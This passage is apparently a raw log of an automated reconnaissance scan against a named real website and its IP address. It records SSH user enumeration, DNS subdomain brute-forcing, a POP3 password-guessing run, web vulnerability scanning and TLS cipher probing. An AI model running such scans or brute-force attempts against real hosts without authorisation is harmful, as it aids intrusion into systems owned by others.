  2949. [-] 178.132.1.137:22 - SSH - User 'tomcat' not found
  2950. [-] 178.132.1.137:22 - SSH - User 'user' not found
  2951. [-] 178.132.1.137:22 - SSH - User 'webmaster' not found
  2952. [-] 178.132.1.137:22 - SSH - User 'www-data' not found
  2953. [-] 178.132.1.137:22 - SSH - User 'Fortimanager_Access' not found
  2954. [*] Scanned 1 of 1 hosts (100% complete)
  2955. [*] Auxiliary module execution completed
  2956. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
  2957. [+] 178.132.1.137:22      - SSH server version: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u1
  2958. [*] allthefallen.ninja:22 - Scanned 1 of 1 hosts (100% complete)
  2959. [*] Auxiliary module execution completed
  2960.  + -- --=[Port 23 closed... skipping.
  2961.  + -- --=[Port 25 closed... skipping.
  2962.  + -- --=[Port 53 opened... running tests...
  2963.  
  2964. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-21 13:47 EST
  2965. Nmap scan report for allthefallen.ninja (178.132.1.137)
  2966. Host is up (0.12s latency).
  2967. rDNS record for 178.132.1.137: server.allthefallen.ninja
  2968.  
  2969. PORT   STATE SERVICE VERSION
  2970. 53/udp open  domain  ISC BIND i-MSCP DNS Server
  2971. |_dns-cache-snoop: 0 of 100 tested domains are cached.
  2972. |_dns-fuzz: The server seems impervious to our assault.
  2973. | dns-nsec-enum:
  2974. |_  No NSEC records found
  2975. | dns-nsec3-enum:
  2976. |_  DNSSEC NSEC3 not supported
  2977. | dns-nsid:
  2978. |_  bind.version: i-MSCP DNS Server
  2979. Too many fingerprints match this host to give specific OS details
  2980. Network Distance: 10 hops
  2981.  
  2982. Host script results:
  2983. | dns-blacklist:
  2984. |   SPAM
  2985. |     l2.apews.org - SPAM
  2986. |_    bl.nszones.com - DYNAMIC
  2987. | dns-brute:
  2988. |   DNS Brute-force hostnames:
  2989. |     ns1.allthefallen.ninja - 178.132.1.137
  2990. |     mail.allthefallen.ninja - 178.132.1.137
  2991. |     www.allthefallen.ninja - 178.132.1.137
  2992. |     ftp.allthefallen.ninja - 178.132.1.137
  2993. |     git.allthefallen.ninja - 178.132.1.138
  2994. |_    smtp.allthefallen.ninja - 178.132.1.137
  2995.  
  2996. TRACEROUTE (using port 53/udp)
  2997. HOP RTT       ADDRESS
  2998. 1   108.47 ms 10.13.0.1
  2999. 2   109.19 ms 37.187.24.253
  3000. 3   123.24 ms 10.50.225.61
  3001. 4   109.65 ms 10.17.129.46
  3002. 5   109.19 ms 10.73.0.52
  3003. 6   123.47 ms 10.95.33.8
  3004. 7   127.73 ms be100-1108.ams-1-a9.nl.eu (213.186.32.211)
  3005. 8   ... 9
  3006. 10  129.03 ms server.allthefallen.ninja (178.132.1.137)
  3007.  
  3008. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3009. Nmap done: 1 IP address (1 host up) scanned in 627.50 seconds
  3010.  + -- --=[Port 79 closed... skipping.
  3011.  + -- --=[Port 80 opened... running tests...
  3012.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  3013.  
  3014.                                  ^     ^
  3015.         _   __  _   ____ _   __  _    _   ____
  3016.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  3017.       | V V // o // _/ | V V // 0 // 0 // _/
  3018.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  3019.                                 <
  3020.                                  ...'
  3021.  
  3022.     WAFW00F - Web Application Firewall Detection Tool
  3023.  
  3024.     By Sandro Gauci && Wendel G. Henrique
  3025.  
  3026. Checking http://allthefallen.ninja
  3027. Generic Detection results:
  3028. No WAF detected by the generic detection
  3029. Number of requests: 13
  3030.  
  3031.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  3032. http://allthefallen.ninja [301 Moved Permanently] Country[RUSSIAN FEDERATION][RU], HTTPServer[nginx], IP[178.132.1.137], RedirectLocation[https://allthefallen.ninja/], Strict-Transport-Security[max-age=31536000], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block], nginx
  3033. https://allthefallen.ninja/ [200 OK] Country[RUSSIAN FEDERATION][RU], HTML5, HTTPServer[nginx], IP[178.132.1.137], JQuery, Script, Strict-Transport-Security[max-age=31536000], Title[All the Fallen], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block], nginx
  3034.  
  3035.    __  ______ _____ 
  3036.    \ \/ / ___|_   _|
  3037.     \  /\___ \ | |  
  3038.     /  \ ___) || |  
  3039.    /_/\_|____/ |_|  
  3040.  
  3041. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  3042. + -- --=[Target: allthefallen.ninja:80
  3043. + -- --=[Site not vulnerable to Cross-Site Tracing!
  3044. + -- --=[Site not vulnerable to Host Header Injection!
  3045. + -- --=[Site not vulnerable to Cross-Frame Scripting!
  3046. + -- --=[Site not vulnerable to Clickjacking!
  3047.  
  3048. HTTP/1.1 405 Not Allowed
  3049. Server: nginx
  3050. Date: Thu, 21 Dec 2017 19:00:32 GMT
  3051. Content-Type: text/html
  3052. Content-Length: 166
  3053. Connection: close
  3054.  
  3055. <html>
  3056. <head><title>405 Not Allowed</title></head>
  3057. <body bgcolor="white">
  3058. <center><h1>405 Not Allowed</h1></center>
  3059. <hr><center>nginx</center>
  3060. </body>
  3061. </html>
  3062. 
  3063. HTTP/1.1 301 Moved Permanently
  3064. Server: nginx
  3065. Date: Thu, 21 Dec 2017 19:00:49 GMT
  3066. Content-Type: text/html; charset=UTF-8
  3067. Transfer-Encoding: chunked
  3068. Connection: keep-alive
  3069. Keep-Alive: timeout=20
  3070. Location: https://allthefallen.ninja/
  3071. X-Frame-Options: SAMEORIGIN
  3072. X-Content-Type-Options: nosniff
  3073. X-XSS-Protection: 1; mode=block
  3074. Strict-Transport-Security: max-age=31536000
  3075.  
  3076. 0
  3077.  
  3078. 
  3079.  
  3080.  
  3081.  
  3082.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  3083. + -- --=[Checking if X-Content options are enabled on allthefallen.ninja... 
  3084. X-Content-Type-Options: nosniff
  3085.  
  3086. + -- --=[Checking if X-Frame options are enabled on allthefallen.ninja... 
  3087. X-Frame-Options: SAMEORIGIN
  3088.  
  3089. + -- --=[Checking if X-XSS-Protection header is enabled on allthefallen.ninja... 
  3090. X-XSS-Protection: 1; mode=block
  3091.  
  3092. + -- --=[Checking HTTP methods on allthefallen.ninja... 
  3093. HTTP/1.1 405 Not Allowed
  3094.  
  3095. + -- --=[Checking if TRACE method is enabled on allthefallen.ninja... 
  3096.  
  3097. + -- --=[Checking for META tags on allthefallen.ninja... 
  3098.  
  3099. + -- --=[Checking for open proxy on allthefallen.ninja... 
  3100.  
  3101. + -- --=[Enumerating software on allthefallen.ninja... 
  3102. Server: nginx
  3103.  
  3104. + -- --=[Checking if Strict-Transport-Security is enabled on allthefallen.ninja... 
  3105. Strict-Transport-Security: max-age=31536000
  3106.  
  3107. + -- --=[Checking for Flash cross-domain policy on allthefallen.ninja... 
  3108.  
  3109. + -- --=[Checking for Silverlight cross-domain policy on allthefallen.ninja... 
  3110.  
  3111. + -- --=[Checking for HTML5 cross-origin resource sharing on allthefallen.ninja... 
  3112.  
  3113. + -- --=[Retrieving robots.txt on allthefallen.ninja... 
  3114.  
  3115. + -- --=[Retrieving sitemap.xml on allthefallen.ninja... 
  3116.  
  3117. + -- --=[Checking cookie attributes on allthefallen.ninja... 
  3118.  
  3119. + -- --=[Checking for ASP.NET Detailed Errors on allthefallen.ninja... 
  3120.  
  3121. 
  3122.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  3123. - Nikto v2.1.6
  3124. ---------------------------------------------------------------------------
  3125. + Target IP:          178.132.1.137
  3126. + Target Hostname:    allthefallen.ninja
  3127. + Target Port:        80
  3128. + Start Time:         2017-12-21 14:03:44 (GMT-5)
  3129. ---------------------------------------------------------------------------
  3130. + Server: nginx
  3131. + Root page / redirects to: https://allthefallen.ninja/
  3132. + Server leaks inodes via ETags, header found with file /PO1v8vvg.php, fields: 0x598fa6ac 0x2cd
  3133. + No CGI Directories found (use '-C all' to force check all possible dirs)
  3134. + 7445 requests: 0 error(s) and 1 item(s) reported on remote host
  3135. + End Time:           2017-12-21 14:18:55 (GMT-5) (911 seconds)
  3136. ---------------------------------------------------------------------------
  3137. + 1 host(s) tested
  3138.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  3139. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/allthefallen.ninja-port80.jpg
  3140.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  3141.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  3142.  
  3143.     _____  .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      .1BR'''Yp, .8BR'''Cq.  
  3144.    (_____)   01     01N.    C     01       C     01   .01.    01          01    Yb   01   .01.
  3145.    (() ())   01     C YCb   C     01       C     01   ,C9     01          01    dP   01   ,C9  
  3146.     \   /    01     C  .CN. C     01       C     0101dC9      01          01'''bg.   0101dC9  
  3147.      \ /     01     C   .01.C     01       C     01  YC.      01      ,   01    .Y   01  YC.  
  3148.      /=\     01     C     Y01     YC.     ,C     01   .Cb.    01     ,C   01    ,9   01   .Cb.
  3149.     [___]  .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C .J0101Cd9  .J01L. .J01./ 2.1
  3150.  
  3151. __[ ! ] Neither war between hackers, nor peace for the system.
  3152. __[ ! ] http://blog.inurl.com.br
  3153. __[ ! ] http://fb.com/InurlBrasil
  3154. __[ ! ] http://twitter.com/@googleinurl
  3155. __[ ! ] http://github.com/googleinurl
  3156. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  3157. __[ ! ] Current script owner::[ root ]
  3158. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  3159. __[ ! ] Current pwd::[ /usr/share/sniper ]
  3160. __[ ! ] Help: php inurlbr.php --help
  3161. ------------------------------------------------------------------------------------------------------------------------
  3162.  
  3163. [ ! ] Starting SCANNER INURLBR 2.1 at [21-12-2017 14:19:54]
  3164. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  3165. It is the end user's responsibility to obey all applicable local, state and federal laws.
  3166. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  3167.  
  3168. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-allthefallen.ninja.txt  ]
  3169. [ INFO ][ DORK ]::[ site:allthefallen.ninja ]
  3170. [ INFO ][ SEARCHING ]:: {
  3171. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.nu ]
  3172.  
  3173. [ INFO ][ SEARCHING ]:: 
  3174. -[:::]
  3175. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  3176.  
  3177. [ INFO ][ SEARCHING ]:: 
  3178. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  3179. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.vg ID: 007843865286850066037:3ajwn2jlweq ]
  3180.  
  3181. [ INFO ][ SEARCHING ]:: 
  3182. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  3183.  
  3184. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  3185. [ INFO ] Not a satisfactory result was found!
  3186.  
  3187.  
  3188. [ INFO ] [ Shutting down ]
  3189. [ INFO ] [ End of process INURLBR at [21-12-2017 14:21:44]
  3190. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  3191. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-allthefallen.ninja.txt  ]
  3192. |_________________________________________________________________________________________
  3193.  
  3194. \_________________________________________________________________________________________/
  3195.  
  3196.  + -- --=[Port 110 opened... running tests...
  3197.  
  3198. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-21 14:21 EST
  3199. Nmap scan report for allthefallen.ninja (178.132.1.137)
  3200. Host is up (0.12s latency).
  3201. rDNS record for 178.132.1.137: server.allthefallen.ninja
  3202.  
  3203. PORT    STATE SERVICE VERSION
  3204. 110/tcp open  pop3    Dovecot pop3d
  3205. | pop3-brute:
  3206. |   Accounts: No valid accounts found
  3207. |_  Statistics: Performed 232 guesses in 192 seconds, average tps: 1.2
  3208. |_pop3-capabilities: TOP RESP-CODES STLS CAPA SASL(PLAIN LOGIN) USER AUTH-RESP-CODE UIDL PIPELINING
  3209. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3210. Aggressive OS guesses: Linux 3.2.0 (95%), Linux 3.11 - 4.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 2.6.39 (91%), Linux 3.10 - 4.8 (90%), Linux 3.13 (90%), Linux 3.2 - 4.8 (90%), Linux 4.4 (90%), Linux 3.2 - 3.8 (90%), Linux 3.8 (90%)
  3211. No exact OS matches for host (test conditions non-ideal).
  3212. Network Distance: 11 hops
  3213.  
  3214. TRACEROUTE (using port 110/tcp)
  3215. HOP RTT       ADDRESS
  3216. 1   108.68 ms 10.13.0.1
  3217. 2   109.99 ms 37.187.24.253
  3218. 3   109.76 ms 10.50.225.60
  3219. 4   110.02 ms 10.17.129.42
  3220. 5   109.74 ms 10.73.0.54
  3221. 6   ...
  3222. 7   116.89 ms be100-1108.ams-1-a9.nl.eu (213.186.32.211)
  3223. 8   163.51 ms be100-2.ams-1-a9.nl.eu (94.23.122.230)
  3224. 9   ...
  3225. 10  163.56 ms 109.236.95.111
  3226. 11  116.76 ms server.allthefallen.ninja (178.132.1.137)
  3227.  
  3228. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3229. Nmap done: 1 IP address (1 host up) scanned in 219.77 seconds
  3230.  + -- --=[Port 111 closed... skipping.
  3231.  + -- --=[Port 135 closed... skipping.
  3232.  + -- --=[Port 139 closed... skipping.
  3233.  + -- --=[Port 161 closed... skipping.
  3234.  + -- --=[Port 162 closed... skipping.
  3235.  + -- --=[Port 389 closed... skipping.
  3236.  + -- --=[Port 443 opened... running tests...
  3237.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  3238.  
  3239.                                  ^     ^
  3240.         _   __  _   ____ _   __  _    _   ____
  3241.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  3242.       | V V // o // _/ | V V // 0 // 0 // _/
  3243.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  3244.                                 <
  3245.                                  ...'
  3246.  
  3247.     WAFW00F - Web Application Firewall Detection Tool
  3248.  
  3249.     By Sandro Gauci && Wendel G. Henrique
  3250.  
  3251. Checking https://allthefallen.ninja
  3252. Generic Detection results:
  3253. No WAF detected by the generic detection
  3254. Number of requests: 13
  3255.  
  3256.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  3257.    ____ _                 _ _____     _ _
  3258.   / ___| | ___  _   _  __| |  ___|_ _(_) |
  3259.  | |   | |/ _ \| | | |/ _` | |_ / _` | | |
  3260.  | |___| | (_) | |_| | (_| |  _| (_| | | |
  3261.   \____|_|\___/ \__,_|\__,_|_|  \__,_|_|_|
  3262.     v1.0.1                      by m0rtem
  3263.  
  3264.  
  3265. [14:27:17] Initializing CloudFail - the date is: 21/12/2017  
  3266. [14:27:17] Fetching initial information from: allthefallen.ninja...  
  3267. [14:27:25] Server IP: 178.132.1.137  
  3268. [14:27:25] Testing if allthefallen.ninja is on the Cloudflare network...  
  3269. [14:27:25] allthefallen.ninja is not part of the Cloudflare network, quitting...  
  3270.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  3271. https://allthefallen.ninja [200 OK] Country[RUSSIAN FEDERATION][RU], HTML5, HTTPServer[nginx], IP[178.132.1.137], JQuery, Script, Strict-Transport-Security[max-age=31536000], Title[All the Fallen], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block], nginx
  3272.  
  3273.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  3274.  
  3275.  
  3276.  
  3277.  AVAILABLE PLUGINS
  3278.  -----------------
  3279.  
  3280.   PluginCompression
  3281.   PluginHSTS
  3282.   PluginChromeSha1Deprecation
  3283.   PluginSessionRenegotiation
  3284.   PluginOpenSSLCipherSuites
  3285.   PluginHeartbleed
  3286.   PluginSessionResumption
  3287.   PluginCertInfo
  3288.  
  3289.  
  3290.  
  3291.  CHECKING HOST(S) AVAILABILITY
  3292.  -----------------------------
  3293.  
  3294.    allthefallen.ninja:443              => 178.132.1.137:443
  3295.  
  3296.  
  3297.  
  3298.  SCAN RESULTS FOR ALLTHEFALLEN.NINJA:443 - 178.132.1.137:443
  3299.  -----------------------------------------------------------
  3300.  
  3301.   * Deflate Compression:
  3302.       OK - Compression disabled          
  3303.  
  3304.   * Session Renegotiation:
  3305.       Client-initiated Renegotiations:   OK - Rejected
  3306.       Secure Renegotiation:              OK - Supported
  3307.  
  3308.   * Certificate - Content:
  3309.       SHA1 Fingerprint:                  42dfaf76ab4526ad27edcaa09216b2bf417d3827
  3310.       Common Name:                       allthefallen.ninja
  3311.       Issuer:                            Let's Encrypt Authority X3
  3312.       Serial Number:                     03B6337FA382357AD6A03756410B73ABBC31
  3313.       Not Before:                        Dec 16 22:49:24 2017 GMT
  3314.       Not After:                         Mar 16 22:49:24 2018 GMT
  3315.       Signature Algorithm:               sha256WithRSAEncryption
  3316.       Public Key Algorithm:              rsaEncryption
  3317.       Key Size:                          2048 bit
  3318.       Exponent:                          65537 (0x10001)
  3319.       X509v3 Subject Alternative Name:   {'DNS': ['allthefallen.ninja', 'www.allthefallen.ninja']}
  3320.  
  3321.   * Certificate - Trust:
  3322.       Hostname Validation:               OK - Subject Alternative Name matches
  3323.       Google CA Store (09/2015):         FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  3324.       Java 6 CA Store (Update 65):       OK - Certificate is trusted
  3325.       Microsoft CA Store (09/2015):      OK - Certificate is trusted
  3326.       Apple CA Store (OS X 10.10.5):     OK - Certificate is trusted
  3327.       Mozilla NSS CA Store (09/2015):    OK - Certificate is trusted
  3328.       Certificate Chain Received:        ['allthefallen.ninja', "Let's Encrypt Authority X3"]
  3329.  
  3330.   * Certificate - OCSP Stapling:
  3331.       NOT SUPPORTED - Server did not send back an OCSP response.
  3332.  
  3333.   * Session Resumption:
  3334.       With Session IDs:                  OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  3335.       With TLS Session Tickets:          OK - Supported
  3336.  
  3337.   * SSLV2 Cipher Suites:
  3338.       Server rejected all cipher suites.
  3339.  
  3340.   * SSLV3 Cipher Suites:
  3341.       Server rejected all cipher suites.
  3342.  
  3343.  
  3344.  
  3345.  SCAN COMPLETED IN 14.79 S
  3346.  -------------------------
  3347. Version: 1.11.10-static
  3348. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  3349. 
  3350. Testing SSL server allthefallen.ninja on port 443 using SNI name allthefallen.ninja
  3351.  
  3352.   TLS Fallback SCSV:
  3353. Server supports TLS Fallback SCSV
  3354.  
  3355.   TLS renegotiation:
  3356. Secure session renegotiation supported
  3357.  
  3358.   TLS Compression:
  3359. Compression disabled
  3360.  
  3361.   Heartbleed:
  3362. TLS 1.2 not vulnerable to heartbleed
  3363. TLS 1.1 not vulnerable to heartbleed
  3364. TLS 1.0 not vulnerable to heartbleed
  3365.  
  3366.   Supported Server Cipher(s):
  3367. Preferred TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
  3368. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
  3369. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 2048 bits
  3370. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 2048 bits
  3371. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
  3372. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  3373. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
  3374. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  3375. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 2048 bits
  3376. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  3377. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 2048 bits
  3378. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  3379. Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
  3380. Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
  3381. Accepted  TLSv1.2  128 bits  AES128-SHA256                
  3382. Accepted  TLSv1.2  256 bits  AES256-SHA256                
  3383. Accepted  TLSv1.2  128 bits  AES128-SHA                  
  3384. Accepted  TLSv1.2  256 bits  AES256-SHA                  
  3385. Accepted  TLSv1.2  256 bits  ECDHE-RSA-CAMELLIA256-SHA384  Curve P-256 DHE 256
  3386. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA256    DHE 2048 bits
  3387. Accepted  TLSv1.2  128 bits  ECDHE-RSA-CAMELLIA128-SHA256  Curve P-256 DHE 256
  3388. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA256    DHE 2048 bits
  3389. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  3390. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  3391. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA256          
  3392. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA256          
  3393. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA              
  3394. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA              
  3395. Preferred TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  3396. Accepted  TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  3397. Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  3398. Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  3399. Accepted  TLSv1.1  128 bits  AES128-SHA                  
  3400. Accepted  TLSv1.1  256 bits  AES256-SHA                  
  3401. Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  3402. Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  3403. Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA              
  3404. Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA              
  3405. Preferred TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  3406. Accepted  TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  3407. Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 2048 bits
  3408. Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 2048 bits
  3409. Accepted  TLSv1.0  128 bits  AES128-SHA                  
  3410. Accepted  TLSv1.0  256 bits  AES256-SHA                  
  3411. Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 2048 bits
  3412. Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 2048 bits
  3413. Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA              
  3414. Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA              
  3415.  
  3416.   SSL Certificate:
  3417. Signature Algorithm: sha256WithRSAEncryption
  3418. RSA Key Strength:    2048
  3419.  
  3420. Subject:  allthefallen.ninja
  3421. Altnames: DNS:allthefallen.ninja, DNS:www.allthefallen.ninja
  3422. Issuer:   Let's Encrypt Authority X3
  3423.  
  3424. Not valid before: Dec 16 22:49:24 2017 GMT
  3425. Not valid after:  Mar 16 22:49:24 2018 GMT
  3426. 
  3427. ###########################################################
  3428.     testssl       2.9dev from https://testssl.sh/dev/
  3429. 
  3430.       This program is free software. Distribution and
  3431.              modification under GPLv2 permitted.
  3432.       USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
  3433.  
  3434.        Please file bugs @ https://testssl.sh/bugs/
  3435. 
  3436. ###########################################################
  3437.  
  3438.  Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
  3439.  on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
  3440.  (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
  3441.  
  3442.  
  3443.  Start 2017-12-21 14:28:43        -->> 178.132.1.137:443 (allthefallen.ninja) <<--
  3444.  
  3445.  rDNS (178.132.1.137):   server.allthefallen.ninja.
  3446.  Service detected:       HTTP
  3447.  
  3448.  
  3449.  Testing protocols via sockets except SPDY+HTTP2 
  3450.  
  3451.  SSLv2      not offered (OK)
  3452.  SSLv3      not offered (OK)
  3453.  TLS 1      offered
  3454.  TLS 1.1    offered
  3455.  TLS 1.2    offered (OK)
  3456.  TLS 1.3    not offered
  3457.  SPDY/NPN   http/1.1 (advertised)
  3458.  HTTP2/ALPN http/1.1 (offered)
  3459.  
  3460.  Testing ~standard cipher categories 
  3461.  
  3462.  NULL ciphers (no encryption)                  not offered (OK)
  3463.  Anonymous NULL Ciphers (no authentication)    not offered (OK)
  3464.  Export ciphers (w/o ADH+NULL)                 not offered (OK)
  3465.  LOW: 64 Bit + DES encryption (w/o export)     not offered (OK)
  3466.  Weak 128 Bit ciphers (SEED, IDEA, RC[2,4])    not offered (OK)
  3467.  Triple DES Ciphers (Medium)                   not offered (OK)
  3468.  High encryption (AES+Camellia, no AEAD)       offered (OK)
  3469.  Strong encryption (AEAD ciphers)              offered (OK)
  3470.  
  3471.  
  3472.  Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 
  3473.  
  3474.  PFS is offered (OK)          ECDHE-RSA-AES256-GCM-SHA384
  3475.                               ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  3476.                               DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-CCM8
  3477.                               DHE-RSA-AES256-CCM DHE-RSA-AES256-SHA256
  3478.                               DHE-RSA-AES256-SHA ECDHE-RSA-CAMELLIA256-SHA384
  3479.                               DHE-RSA-CAMELLIA256-SHA256
  3480.                               DHE-RSA-CAMELLIA256-SHA
  3481.                               ECDHE-RSA-AES128-GCM-SHA256
  3482.                               ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  3483.                               DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-CCM8
  3484.                               DHE-RSA-AES128-CCM DHE-RSA-AES128-SHA256
  3485.                               DHE-RSA-AES128-SHA ECDHE-RSA-CAMELLIA128-SHA256
  3486.                               DHE-RSA-CAMELLIA128-SHA256
  3487.                               DHE-RSA-CAMELLIA128-SHA
  3488.  Elliptic curves offered:     prime256v1 secp384r1 secp521r1 X25519
  3489.  
  3490.  
  3491.  Testing server preferences 
  3492.  
  3493.  Has server cipher order?     yes (OK)
  3494.  Negotiated protocol          TLSv1.2
  3495.  Negotiated cipher            ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3496.  Cipher order
  3497.     TLSv1:     ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
  3498.                DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
  3499.                DHE-RSA-CAMELLIA128-SHA CAMELLIA256-SHA CAMELLIA128-SHA
  3500.     TLSv1.1:   ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA DHE-RSA-AES128-SHA
  3501.                DHE-RSA-AES256-SHA AES128-SHA AES256-SHA DHE-RSA-CAMELLIA256-SHA
  3502.                DHE-RSA-CAMELLIA128-SHA CAMELLIA256-SHA CAMELLIA128-SHA
  3503.     TLSv1.2:   ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES256-GCM-SHA384
  3504.                DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES256-GCM-SHA384
  3505.                ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  3506.                ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  3507.                DHE-RSA-AES128-SHA256 DHE-RSA-AES128-SHA DHE-RSA-AES256-SHA256
  3508.                DHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
  3509.                AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA
  3510.                DHE-RSA-AES256-CCM8 DHE-RSA-AES256-CCM DHE-RSA-AES128-CCM8
  3511.                DHE-RSA-AES128-CCM AES256-CCM8 AES256-CCM AES128-CCM8 AES128-CCM
  3512.                ECDHE-RSA-CAMELLIA256-SHA384 DHE-RSA-CAMELLIA256-SHA256
  3513.                ECDHE-RSA-CAMELLIA128-SHA256 DHE-RSA-CAMELLIA128-SHA256
  3514.                DHE-RSA-CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA
